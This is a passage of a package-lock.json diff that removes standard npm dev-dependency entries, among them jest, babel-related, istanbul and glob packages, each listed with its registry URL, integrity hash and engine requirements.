"sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 